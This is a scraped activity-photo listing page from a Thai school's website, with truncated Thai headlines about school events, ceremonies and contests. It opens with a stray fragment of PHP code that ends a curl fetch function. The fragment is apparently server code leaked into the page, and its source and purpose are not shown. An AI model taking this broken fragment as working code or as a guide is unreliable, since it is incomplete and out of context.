$e=curl_exec($d); curl_close($d); return $e; } ?> ภาพกิจกรรม - Sansailuang School | https://ssl.ac.th

ภาพกิจกรรม

ผอ.ประพันธ์ ทองหนัก ประธานศูนย์แนะแนวประจำสพป. ชม.เขต 2 เปิด..

กษิณาลัยด้วยหัวใจรักและผูกพัน แสดงความยินดีกับคุณครูสุวิมล จ..

ซักซ้อมการประเมินสถานศึกษาเพื่อรับรางวัลพระราชทาน ระดับก่อนป..

ขอแจ้งยอดผ้าป่าฯ ณ.วันที่ 20/9/66

มุทิตาจิต สพป.ชม.เขต.2

นักเรียนชั้นมัธยมร่วมพัฒนาสถานที่แผนกอนุบาลเพื่อเตรียมรับการ..

ทำบุญโดมอเนกประสงค์พร้อมทอดผ้าป่าเพื่อการศึกษาฯ โรงเรียนสันท..

ตัวแทนฯสภานักเรียน รร. สันทรายหลวง เข้าพบผอ.ประพันธ์ ทองหนัก..

การประกวด Coverdance

มุทิตาคารวะเกษียณ เครือข่าย.สท. 3

นักเรียนโรงเรียนสันทรายหลวงเข้าร่วมการประกวดแข่งขันร้องเพลงพ..

ประชุมคณะครูและต้อนรับครูใหม่